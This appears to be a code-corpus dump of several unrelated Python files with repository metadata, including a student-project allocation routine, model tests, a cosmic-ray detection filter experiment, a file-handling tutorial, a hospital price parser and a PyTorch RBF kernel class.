lectAssignments[currentLecturer].pop(idx)
if worst in studAssignments:
idx = library.firstidx(projAssignments[studAssignments[worst]], worst)
projAssignments[studAssignments[worst]].pop(idx)
if worst not in unassignedStudents:
unassignedStudents.append(worst)
if worst in studAssignments:
studAssignments.pop(worst)
#Is the project full?
if len(projAssignments[currentProject]) == int(projCaps[currentProject]):
maxidx = -1
for value in projAssignments[currentProject]:
idx = library.firstidx(projectedPrefs[currentProject], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Project "+currentProject+" is full: removing successors to "+worst)
idx = library.firstidx(projectedPrefs[currentProject],worst)
a = []
if idx == -1 or idx == len(projectedPrefs[currentProject])-1:
pass
else:
for i in range(idx+1,len(projectedPrefs[currentProject])):
a.append(projectedPrefs[currentProject][i])
for i in a:
while True:
idx = library.firstidx(studPrefs[i],currentProject)
if idx > -1:
studPrefs[i].pop(idx)
if idx == -1:
break
#Is the lecturer full?
if len(lectAssignments[currentLecturer]) == int(lecturercaps[currentLecturer]):
maxidx = -1
for value in lectAssignments[currentLecturer]:
idx = library.firstidx(lecturerprefs[currentLecturer], value)
if idx == -1:
maxidx = idx
worst = value
break
if idx > maxidx:
maxidx = idx
worst = value
if updates == True:
print("Lecturer "+currentLecturer+" is full: removing successors to "+worst+"\n")
idx = library.firstidx(lecturerprefs[currentLecturer],worst)
a = []
if idx == -1 or idx == len(lecturerprefs[currentLecturer])-1:
pass
else:
for i in range(idx+1,len(lecturerprefs[currentLecturer])):
a.append(lecturerprefs[currentLecturer][i])
for i in a:
for project in lectProjs[currentLecturer]:
while True:
idx = library.firstidx(projectedPrefs[project], i)
if idx > -1:
projectedPrefs[project].pop(idx)
if idx == -1:
break
while True:
idx = library.firstidx(studPrefs[i],project)
if idx > -1:
studPrefs[i].pop(idx)
if idx == -1:
break
if updates == True:
print(str(iters)+": Remaining students:" + str(unassignedStudents)+"\n-------------\n")
else:
done= 1
else:
done= 1
return {"Student Assignments":studAssignments, "Lecturer Assignments": lectAssignments, "Project Assignments": projAssignments, "Unassigned Students": unassignedStudents}
def random_distribute(unassignedStudents,studAssignments,projAssignments,projCaps,lectAssignments,lecturercaps, lectProjs, projLects, updates):
freeprojects = []
unassignedStudentsCopy = unassignedStudents
freeprojects = library.findFreeProjects(projAssignments, projCaps, lectAssignments, lecturercaps, lectProjs)
if updates == True:
print("***Distributing remaining "+str(len(unassignedStudents))+" students***\n")
if updates == True and len(unassignedStudents) <= len(freeprojects):
print(str(
len(freeprojects)) + " projects are available. All remaining students will be randomly allocated a project\n")
elif updates == True and len(freeprojects) < len(unassignedStudents):
diff = len(unassignedStudents) - len(freeprojects)
print(
str(len(freeprojects)) + " projects are available. " + str(diff) + " students will not be assigned to projects\n")
for student in unassignedStudentsCopy:
if len(freeprojects) > 0:
thisproject = random.choice(freeprojects)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
if updates:
print("Student "+student+" has been allocated to project "+thisproject+" with lecturer "+thislecturer)
studAssignments.update({student:thisproject})
freeprojects.pop(0)
for student in studAssignments:
if student in unassignedStudents:
unassignedStudents.remove(student)
return{"Student Assignments": studAssignments, "Lecturer Assignments":lectAssignments, "Project Assignments":projAssignments, "Unassigned Students": unassignedStudents}
def topic_distribute(unassignedStudents,studTopicPrefs,studAssignments,projAssignments,projCaps,lectAssignments,lecturercaps, projLects, lectProjs, updates):
freeprojects = []
unassignedStudentsCopy = unassignedStudents
freeprojects = library.findFreeProjects(projAssignments, projCaps, lectAssignments, lecturercaps, lectProjs)
if updates == True:
print("***Distributing remaining " + str(len(unassignedStudents)) + " students***\n")
elif updates == True and len(freeprojects) < len(unassignedStudents):
diff = len(unassignedStudents) - len(freeprojects)
print(
str(len(
freeprojects)) + " projects are available. " + diff + " students will not be assigned to projects\n")
inorgfree = []
orgfree = []
medfree = []
physfree = []
for project in freeprojects:
if re.match("I[A-Z][0-9][0-9]", project) is not None:
inorgfree.append(project)
if re.match("O[A-Z][0-9][0-9]", project) is not None:
orgfree.append(project)
if re.match("P[A-Z][0-9][0-9]", project) is not None:
physfree.append(project)
if re.match("M[A-Z][0-9][0-9]", project) is not None:
medfree.append(project)
for student in unassignedStudentsCopy:
print("Assigning student "+student)
if len(freeprojects) > 0:
print("There are "+str(len(freeprojects))+" projects remaining")
for topic in studTopicPrefs[student]:
print("Currently looking for an "+topic+" project")
if topic == "I" and len(inorgfree) > 0:
print("Found I")
thisproject = random.choice(inorgfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
inorgfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print("Allocated "+student+" to project "+thisproject+" with lecturer "+ thislecturer+"\n")
break
if topic == "O" and len(orgfree) > 0:
print("Found O")
thisproject = random.choice(orgfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
orgfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
if topic == "P" and len(physfree) > 0:
print("Found P")
thisproject = random.choice(physfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
physfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
if topic == "M" and len(medfree) > 0:
print("Found M")
thisproject = random.choice(medfree)
thislecturer = projLects[thisproject]
if thisproject not in projAssignments:
projAssignments.update({thisproject: []})
projAssignments[thisproject].append(student)
else:
projAssignments[thisproject].append(student)
if thislecturer not in lectAssignments:
lectAssignments.update({thislecturer: []})
lectAssignments[thislecturer].append(student)
else:
lectAssignments[thislecturer].append(student)
studAssignments.update({student: thisproject})
freeprojects.remove(thisproject)
medfree.remove(thisproject)
#unassignedStudents.remove(student)
if updates:
print(
"Allocated " + student + " to project " + thisproject + " with lecturer " + thislecturer + "\n")
break
for student in studAssignments:
if student in unassignedStudents:
unassignedStudents.remove(student)
#random.shuffle(unassignedStudentsCopy)
return{"Student Assignments": studAssignments, "Lecturer Assignments":lectAssignments, "Project Assignments":projAssignments, "Unassigned Students": unassignedStudents}
| 38.53406 | 172 | 0.680031 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,979 | 0.139938 |
f1f067f028748782da40d03c616d1804024a0dea
| 3,271 |
py
|
Python
|
tests/models/classifiers/test_logistic.py
|
harmsm/epistasis
|
741b25b3e28015aeeba8d4efc94af1e1d811cd63
|
[
"Unlicense"
] | null | null | null |
tests/models/classifiers/test_logistic.py
|
harmsm/epistasis
|
741b25b3e28015aeeba8d4efc94af1e1d811cd63
|
[
"Unlicense"
] | null | null | null |
tests/models/classifiers/test_logistic.py
|
harmsm/epistasis
|
741b25b3e28015aeeba8d4efc94af1e1d811cd63
|
[
"Unlicense"
] | 2 |
2020-04-02T00:58:24.000Z
|
2021-11-16T13:30:30.000Z
|
import pytest
# External imports
import numpy as np
from gpmap import GenotypePhenotypeMap
# Module to test
import epistasis
from epistasis.models.classifiers import *
THRESHOLD = 0.2
@pytest.fixture
def gpm(test_data):
"""
Create a genotype-phenotype map
"""
d = test_data[0]
return GenotypePhenotypeMap(genotype=d["genotype"],
phenotype=d["phenotype"],
wildtype=d["wildtype"])
def test_init(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
# Tests
assert model.order == 1
assert model.model_type == "local"
def test_fit(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
assert hasattr(model, "classes")
assert hasattr(model, "epistasis")
assert hasattr(model, "coef_")
def test_predict(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
ypred = model.predict()
assert len(ypred) == model.gpm.num_genotypes
def test_predict_proba(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
probs = model.predict_proba()
# check probs is the right length
assert len(probs) == model.gpm.num_genotypes
# Check probs are between 0 and 1
assert np.all(probs <= 1)
assert np.all(probs >= 0)
def test_predict_log_proba(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
probs = model.predict_log_proba()
# check probs is the right length
assert len(probs) == model.gpm.num_genotypes
# Check log probs are less than or equal to 0
assert np.all(probs <= 0)
def test_score(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
score = model.score()
# Test score is between 0 and 1
assert 0 <= score <= 1
def test_thetas(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
# Check thetas is the correct length
assert len(model.thetas) == len(model.coef_[0])
def test_hypothesis(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
# these should be equal if working properly
pred = model.predict_proba()[:, 0]
hypo = model.hypothesis()
#np.testing.assert_almost_equal(pred, hypo)
def test_lnlikelihood(gpm):
model = EpistasisLogisticRegression(threshold=THRESHOLD,
model_type="local")
model.add_gpm(gpm)
model.fit()
lnlike = model.lnlikelihood()
# Check we get a float
assert lnlike.dtype == float
| 27.258333 | 60 | 0.61174 | 0 | 0 | 0 | 0 | 284 | 0.086824 | 0 | 0 | 535 | 0.163559 |
f1f07ae2628711dd9b1d256f9780dc722c6f8e53
| 381 |
py
|
Python
|
backend/notifications/admin.py
|
solitariaa/CMPUT404-project-socialdistribution
|
f9e23a10e209f8bf7ed062e105f44038751f7c74
|
[
"W3C-20150513"
] | 1 |
2022-03-01T03:03:40.000Z
|
2022-03-01T03:03:40.000Z
|
backend/notifications/admin.py
|
solitariaa/CMPUT404-project-socialdistribution
|
f9e23a10e209f8bf7ed062e105f44038751f7c74
|
[
"W3C-20150513"
] | 51 |
2022-02-09T06:18:27.000Z
|
2022-03-28T19:01:54.000Z
|
backend/notifications/admin.py
|
solitariaa/CMPUT404-project-socialdistribution
|
f9e23a10e209f8bf7ed062e105f44038751f7c74
|
[
"W3C-20150513"
] | 2 |
2022-03-13T20:58:10.000Z
|
2022-03-19T06:29:56.000Z
|
from django.contrib import admin
from .models import Notification
class NotificationAdmin(admin.ModelAdmin):
ordering = ('published',)
search_fields = ('get_author',)
list_display = ('id', 'get_author', 'published', 'summary')
def get_author(self, obj: Notification):
return obj.author.displayName
admin.site.register(Notification, NotificationAdmin)
| 23.8125 | 63 | 0.727034 | 257 | 0.674541 | 0 | 0 | 0 | 0 | 0 | 0 | 59 | 0.154856 |
f1f2709a9b0d54f4549f4f5b2c964cce095a32f9
| 3,655 |
py
|
Python
|
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | null | null | null |
example/experiments/01_experiment.py
|
dzwiedziu-nkg/credo-classify-framework
|
45417b505b4f4b20a7248f3487ca57a3fd49ccee
|
[
"MIT"
] | 3 |
2020-06-19T15:41:19.000Z
|
2020-06-29T12:47:05.000Z
|
import bz2
import time
import urllib.request
import io
from typing import List, Tuple
from credo_cf import load_json_from_stream, progress_and_process_image, group_by_device_id, group_by_resolution, too_often, near_hot_pixel2, \
too_bright
from credo_cf import xor_preprocess
from credo_cf.commons.utils import get_and_add
WORKING_SET = 'http://mars.iti.pk.edu.pl/~nkg/credo/working_set.json.bz2'
time_profile = {}
def download_working_set(url: str) -> Tuple[List[dict], int]:
print('Download working set...')
data = urllib.request.urlopen(url).read()
print('Decompress...')
json_content = bz2.decompress(data).decode("utf-8")
print('Prase JSON...')
objs, count, errors = load_json_from_stream(io.StringIO(json_content), progress_and_process_image)
print('Parsed %d, skipped %d' % (count, count - len(objs)))
return objs, count
def start_analyze(all_detections):
# print('Make custom grayscale conversion...')
# for d in all_detections:
# convert_to_gray(d)
ts_load = time.time()
print('Group by devices...')
by_devices = group_by_device_id(all_detections)
get_and_add(time_profile, 'grouping', time.time() - ts_load)
drop_counts = {}
leave_good = 0
print('Run experiment...')
dev_no = 0
dev_count = len(by_devices.keys())
for device_id, device_detections in by_devices.items():
ts_load = time.time()
by_resolution = group_by_resolution(device_detections)
get_and_add(time_profile, 'grouping', time.time() - ts_load)
for resolution, detections in by_resolution.items():
dev_no += 1
print('Start device %d of %d, detectons count: %d' % (dev_no, dev_count, len(detections)))
# too_often
ts_load = time.time()
goods = detections
bads, goods = too_often(goods)
get_and_add(drop_counts, 'too_often', len(bads))
get_and_add(time_profile, 'too_often', time.time() - ts_load)
# too_bright
ts_load = time.time()
bads, goods = too_bright(goods, 70, 70)
get_and_add(time_profile, 'too_bright', time.time() - ts_load)
get_and_add(drop_counts, 'too_bright', len(bads))
# xor filter
ts_load = time.time()
if len(goods) > 1:
x_or = xor_preprocess(goods)
get_and_add(time_profile, 'xor', time.time() - ts_load)
# near_hot_pixel2
ts_load = time.time()
bads, goods = near_hot_pixel2(goods)
get_and_add(time_profile, 'near_hot_pixel2', time.time() - ts_load)
get_and_add(drop_counts, 'drop_near_hot_pixel2', len(bads))
# end, counting goods
leave_good += len(goods)
print('\nCount of cut off by filters:')
for f, v in drop_counts.items():
print('%s: %d' % (f, v))
print('Goods: %d' % leave_good)
def main():
# config data source, please uncomment and use one from both
ts_load = time.time()
# choice 1: download from website
working_sets = [download_working_set(WORKING_SET)] # download our working set from our hosting
# choice 2: load from files
# file_names = ['working_set.json']
# working_sets = [load_json(fn, progress_and_process_image) for fn in file_names]
get_and_add(time_profile, 'load', time.time() - ts_load)
for all_detections, count in working_sets:
start_analyze(all_detections)
print('\nTime count:')
for ts, tv in time_profile.items():
print('time: %03d - %s' % (int(tv), ts))
if __name__ == '__main__':
main()
| 31.782609 | 142 | 0.642681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 885 | 0.242134 |
f1f2862dcb680020685252fc0444e7b7a36ac2b8
| 427 |
py
|
Python
|
apptweak/ios.py
|
gudhati/apptweak-api-python-library
|
f4a7f7e34548d6d216f3a297d63944c7adbf9667
|
[
"MIT"
] | 5 |
2019-05-21T14:44:57.000Z
|
2020-10-30T04:08:13.000Z
|
apptweak/ios.py
|
gudhati/apptweak-api-python-library
|
f4a7f7e34548d6d216f3a297d63944c7adbf9667
|
[
"MIT"
] | 1 |
2020-08-28T02:42:37.000Z
|
2020-08-28T07:52:54.000Z
|
apptweak/ios.py
|
gudhati/apptweak-api-python-library
|
f4a7f7e34548d6d216f3a297d63944c7adbf9667
|
[
"MIT"
] | 5 |
2019-07-18T13:38:01.000Z
|
2021-06-09T04:12:35.000Z
|
from apptweak.plateform import *
class Ios(Plateform):
plateform_name = 'ios'
def __init__(self):
super().__init__(self.plateform_name)
@classmethod
def ratings(self, application_id, params = {}):
return self.applications(application_id, API_END_PATH['ratings'], params)
@classmethod
def backlinks(self, application_id):
raise Exception('Not implemented for this plateform')
| 26.6875 | 81 | 0.697892 | 392 | 0.918033 | 0 | 0 | 261 | 0.611241 | 0 | 0 | 50 | 0.117096 |
f1f2f70605379c3a09598bf2b8739bb4f47caa1b
| 3,944 |
py
|
Python
|
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
30-Days-Of-Python/30-Days-Of-Python/19_file_handling.py
|
zhaobingwang/python-samples
|
d59f84d2b967cc793cb9b8999f8cdef349fd6fd5
|
[
"MIT"
] | null | null | null |
print('---------- Opening Files for Reading ----------')
f = open('./files/reading_file_example.txt')
print(f) # <_io.TextIOWrapper name='./files/reading_file_example.txt' mode='r' encoding='cp936'>
print('\t---------- read() ----------')
# read(): read the whole text as string. If we want to limit the number of characters we read,
# we can limit it by passing int value to the methods.
f = open('./files/reading_file_example.txt')
txt = f.read()
print(type(txt)) # <class 'str'>
print(txt) # Hello,Python!
f.close()
f = open('./files/reading_file_example.txt')
txt = f.read(5)
print(type(txt)) # <class 'str'>
print(txt) # Hello
f.close()
print('\t---------- readline(): read only the first line ----------')
f = open('./files/reading_file_example.txt')
line = f.readline()
print(type(line)) # <class 'str'>
print(line) # Hello,Python!
f.close()
print('\t---------- readlines(): read all the text line by line and returns a list of lines ----------')
f = open('./files/reading_file_example.txt')
lines = f.readlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
f.close()
print('\t---------- splitlines() ----------')
f = open('./files/reading_file_example.txt')
lines = f.read().splitlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
f.close()
print('\t---------- Another way to close a file ----------')
with open('./files/reading_file_example.txt') as f:
lines = f.read().splitlines()
print(type(lines)) # <class 'list'>
print(lines) # ['Hello,Python!']
print('---------- Opening Files for Writing and Updating ----------')
# To write to an existing file, we must add a mode as parameter to the open() function:
# "a" - append - will append to the end of the file, if the file does not exist it raise FileNotFoundError.
# "w" - write - will overwrite any existing content, if the file does not exist it creates.
with open('./files/writing_file_example.txt', 'a') as f:
f.write('Hello,Python!')
with open('./files/writing_file_example.txt', 'w') as f:
f.write('Hello,Java!')
print('---------- Deleting Files ----------')
import os
if os.path.exists('./files/writing_file_example.txt'):
os.remove('./files/writing_file_example.txt')
else:
os.remove('The file does not exist!')
print('---------- File Types ----------')
print('\t---------- File with json Extension ----------')
# dictionary
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
# JSON: A string form a dictionary
person_json = "{'name': 'Zhang San', 'country': 'China', 'city': 'Hangzhou', 'skills': ['Java', 'C#', 'Python']}"
# we use three quotes and make it multiple line to make it more readable
person_json = '''{
"name":"Zhang San",
"country":"China",
"city":"Hangzhou",
"skills":["Java", "C#","Python"]
}'''
print('\t---------- Changing JSON to Dictionary ----------')
import json
person_json = '''{
"name":"Zhang San",
"country":"China",
"city":"Hangzhou",
"skills":["Java", "C#","Python"]
}'''
person_dct = json.loads(person_json)
print(person_dct)
print(person_dct['name'])
print('\t---------- Changing Dictionary to JSON ----------')
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
person_json = json.dumps(person_dct, indent=4) # indent could be 2, 4, 8. It beautifies the json
print(type(person_json)) # <class 'str'>
print(person_json)
print('\t---------- Saving as JSON File ----------')
person_dct = {
"name": "Zhang San",
"country": "China",
"city": "Hangzhou",
"skills": ["Java", "C#", "Python"]
}
with open('./files/json_example.json', 'w', encoding='utf-8') as f:
json.dump(person_dct, f, ensure_ascii=False, indent=4)
print('\t---------- File with csv Extension ----------')
import csv
# with open('./files/csv_example.csv') as f:
| 31.806452 | 113 | 0.606491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,681 | 0.679767 |
f1f6211abde32ba71ccaac35e7c39eb9935dfa7c
| 2,491 |
py
|
Python
|
data/grady-memorial-hospital/parse.py
|
Afellman/hospital-chargemaster
|
1b87bc64d95d97c0538be7633f9e469e5db624e2
|
[
"MIT"
] | 34 |
2019-01-18T00:15:58.000Z
|
2022-03-26T15:01:08.000Z
|
data/grady-memorial-hospital/parse.py
|
wsheffel/hospital-chargemaster
|
b3473c798fd2f343f7f02c1e32496f9eea9fa94d
|
[
"MIT"
] | 8 |
2019-01-16T22:06:11.000Z
|
2019-02-25T00:59:25.000Z
|
data/grady-memorial-hospital/parse.py
|
wsheffel/hospital-chargemaster
|
b3473c798fd2f343f7f02c1e32496f9eea9fa94d
|
[
"MIT"
] | 10 |
2019-02-20T14:58:16.000Z
|
2021-11-22T21:57:04.000Z
|
#!/usr/bin/env python
import os
from glob import glob
import json
import pandas
import datetime
import sys
here = os.path.dirname(os.path.abspath(__file__))
folder = os.path.basename(here)
latest = '%s/latest' % here
year = datetime.datetime.today().year
output_data = os.path.join(here, 'data-latest.tsv')
output_year = os.path.join(here, 'data-%s.tsv' % year)
# Function read zip into memory
def extract_zip(input_file):
input_zip = ZipFile(input_file)
return {name: input_zip.read(name) for name in input_zip.namelist()}
# Don't continue if we don't have latest folder
if not os.path.exists(latest):
print('%s does not have parsed data.' % folder)
sys.exit(0)
# Don't continue if we don't have results.json
results_json = os.path.join(latest, 'records.json')
if not os.path.exists(results_json):
print('%s does not have results.json' % folder)
sys.exit(1)
with open(results_json, 'r') as filey:
results = json.loads(filey.read())
columns = ['charge_code',
'price',
'description',
'hospital_id',
'filename',
'charge_type']
df = pandas.DataFrame(columns=columns)
for result in results:
filename = os.path.join(latest, result['filename'])
if not os.path.exists(filename):
print('%s is not found in latest folder.' % filename)
continue
if os.stat(filename).st_size == 0:
print('%s is empty, skipping.' % filename)
continue
contents = None
if filename.endswith('txt'):
# ['DESCRIPTION', 'Unnamed: 1', 'PRICE']
contents = pandas.read_csv(filename)
contents = contents.dropna(how='all')
print("Parsing %s" % filename)
print(contents.head())
# Update by row
for row in contents.iterrows():
idx = df.shape[0] + 1
price = row[1]['PRICE'].replace('$','').replace(',','').strip()
entry = [None, # charge code
price, # price
row[1]["DESCRIPTION"], # description
result['hospital_id'], # hospital_id
result['filename'],
'standard'] # filename
df.loc[idx,:] = entry
# Remove empty rows
df = df.dropna(how='all')
# Save data!
print(df.shape)
df.to_csv(output_data, sep='\t', index=False)
df.to_csv(output_year, sep='\t', index=False)
| 29.654762 | 75 | 0.583701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 643 | 0.258129 |
f1f62ac7868b351e283f53daaf44f5e2562dfc27
| 10,476 |
py
|
Python
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | 6 |
2021-12-13T14:30:31.000Z
|
2022-01-24T07:54:57.000Z
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | 10 |
2021-12-18T23:04:53.000Z
|
2022-02-05T02:06:34.000Z
|
DeterministicParticleFlowControl/tests/test_pytorch_kernel.py
|
dimitra-maoutsa/DeterministicParticleFlowControl
|
106bc9b01d7a4888e4ded18c5fb5a989fe672386
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 10 07:20:39 2022
@author: maout
"""
import numpy as np
from scipy.spatial.distance import cdist
import torch
#from score_function_estimators import my_cdist
from typing import Union
from torch.autograd import grad
#%% select available device
def set_device():
device = "cuda" if torch.cuda.is_available() else "cpu"
if device != "cuda":
print("GPU is not enabled in this notebook. \n"
"If you want to enable it, in the menu under `Runtime` -> \n"
"`Hardware accelerator.` and select `GPU` from the dropdown menu")
else:
print("GPU is enabled in this notebook. \n"
"If you want to disable it, in the menu under `Runtime` -> \n"
"`Hardware accelerator.` and select `None` from the dropdown menu")
return device
#%%
class RBF(object):
"""
Class for implementing a Gaussian RBF kernel in pytorch.
Attributes
----------
length_scale : float or list or numpy.array
Length scale of the kernel. Either single float for a single
lengthscale across all dimension or a vector of floats for different
lengthscales across each dimension. Defauls is 1.0
signal_variance : float, optional
This not getting used yet. The default is 1.0.
device : Union[bool,str], optional
Selected device where the computations will be executed,i.e. cpu or gpu.
The default is None, which executes calculations on the cpu.
multil : Union[bool, None], optional
Boolean indicator determining whether lengthscale is a vector or a
single value. The default is False.
K_data : numpy.ndarray
Storage for the evaluation of the kernel on the datapoints (X, Y)
in order to be reused in the calculations of the gradient of the Kernel.
Methods
-------
Kernel(X, Y):
Computes the kernel for the inouts X, and Y. Stores and returns
the result at K_data. Input arrays are of dimensionality (N, D) and
(M, D) respectively. Resulting Kernel has (N, M) dimension.
gradient_X(X, Y):
Computes the gadient of the kernel with respect to the first argument
along all D dimensions.
"""
def __init__(self, length_scale: Union[float, torch.tensor, np.ndarray]=1.0, signal_variance: float=1.0, device: Union[bool,str]=None, multil: Union[bool, None]=False) -> None:
"""
Initialising function for RBF Gaussian kernels using pytorch.
Creates an object with necessary parammeters.
Parameters
----------
length_scale : Union[float, torch.tensor, np.ndarray], optional
Lenghtscale estimated from data. Can be either a single float,
or a vector for floats for different lengthscales for each dimension.
The default is 1.0.
signal_variance : float, optional
This not getting used yet. The default is 1.0.
device : Union[bool,str], optional
Selected device where the computations will be executed,i.e. cpu or gpu.
The default is None, which executes calculations on the cpu.
multil : Union[bool, None], optional
Boolean indicator determining whether lengthscale is a vector or a
single value. The default is False.
TO DO: Remove this option and just check whether length_scale input
is a vector or a single float.
Returns
-------
Instance of the object.
"""
# initialize parameters
if device is None:
self.device = torch.device("cpu")
else:
self.device = device
self.length_scale = torch.tensor(length_scale, dtype=torch.float32, device=self.device,
requires_grad=True)
self.signal_variance = torch.tensor(signal_variance, dtype=torch.float32, device=self.device,
requires_grad=True)
self.multil = torch.tensor(multil, dtype=torch.bool, device=self.device, requires_grad=False)
if self.multil:
##expand dimensions of lengtscale vector to enable broadcasting
self.length_scale = self.length_scale[None, None, :]
self.K_data = torch.tensor(0, dtype=torch.float32, device=self.device, requires_grad=False)
def Kernel(self, X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
if not torch.is_tensor(X):
# convert inputs to pytorch tensors if not already pytorched
X = torch.tensor(X, dtype=torch.float32, device=self.device)
N, D = X.shape
if Y is None:
Y = X
elif not torch.is_tensor(Y):
Y = torch.tensor(Y, dtype=torch.float32, device=self.device)
M, _ = Y.shape
# Re-indexing
X_i = X[:, None, :] # shape (N, D) -> (N, 1, D)
Y_j = Y[None, :, :] # shape (M, D) -> (1, M, D)
if not self.multil: ##if a single lengthscale is provided
# |X_i - Y_j|^2 # (N, M, D)
sqd = torch.sum( (X_i - Y_j)**2, 2)
# Divide by length scale
sqd = torch.div(sqd, self.length_scale.to(self.device)**2)
K = torch.exp( -0.5* sqd )
else:
sqd1 = torch.div( (X_i - Y_j)**2, self.length_scale.to(self.device)**2)
sqd = torch.sum( sqd1, 2)
K = torch.exp( -0.5* sqd )
K = torch.mul(self.signal_variance, K) # Signal Variance
self.K_data = K
return K#.detach().to_numpy()
def gradient_X(self, X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
N, D = X.shape
M,_ = Y.shape
diffs = X[:,None]-Y
redifs = torch.div(diffs, self.length_scale.to(self.device)**2)
redifs = torch.einsum( 'ijk,ij->ijk', redifs, self.K_data)
return redifs
def gradient_X2(self, X):
return None
def gradient_XX(self,X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
# Convert to tensor that requires Grad
X = torch.tensor(self.length_scale, dtype=torch.float32, device=self.device,requires_grad=True)
if Y is None:
Y = X
else:
Y = torch.tensor(Y, dtype=torch.float32, device=self.device, requires_grad=True)
# compute the gradient kernel w.r.t. to the two inputs
J = grad(self.__call__(X, Y))
return J
def gradient_XX2(self, X, Y=None):
return None
#%% numpy versions of kernels functions
def Knp(x,y,l,multil=False):
if multil:
res = np.ones((x.shape[0],y.shape[0]))
for ii in range(len(l)):
tempi = np.zeros((x[:,ii].size, y[:,ii].size ))
##puts into tempi the cdist result
tempi = cdist(x[:,ii].reshape(-1,1), y[:,ii].reshape(-1,1),metric='sqeuclidean')
res = np.multiply(res,np.exp(-tempi/(2*l[ii]*l[ii])))
return res
else:
tempi = np.zeros((x.shape[0], y.shape[0] ))
tempi = cdist(x, y,'sqeuclidean') #this sets into the array tempi the cdist result
return np.exp(-0.5*tempi/(l*l))
def grdx_K_all(x,y,l,multil=False): #gradient with respect to the 1st argument - only which_dim
N,dim = x.shape
M,_ = y.shape
diffs = x[:,None]-y
redifs = np.zeros((1*N,M,dim))
for ii in range(dim):
if multil:
redifs[:,:,ii] = np.multiply(diffs[:,:,ii],Knp(x,y,l,True))/(l[ii]*l[ii])
else:
redifs[:,:,ii] = np.multiply(diffs[:,:,ii],Knp(x,y,l))/(l*l)
return redifs
#%%
DEVICE = set_device()
dtype = torch.float
dim = 2
N = 3
M = 4
X = torch.randn(N, dim, device=DEVICE)
Z = torch.randn(M, dim, device=DEVICE)
# common device agnostic way of writing code that can run on cpu OR gpu
# that we provide for you in each of the tutorials
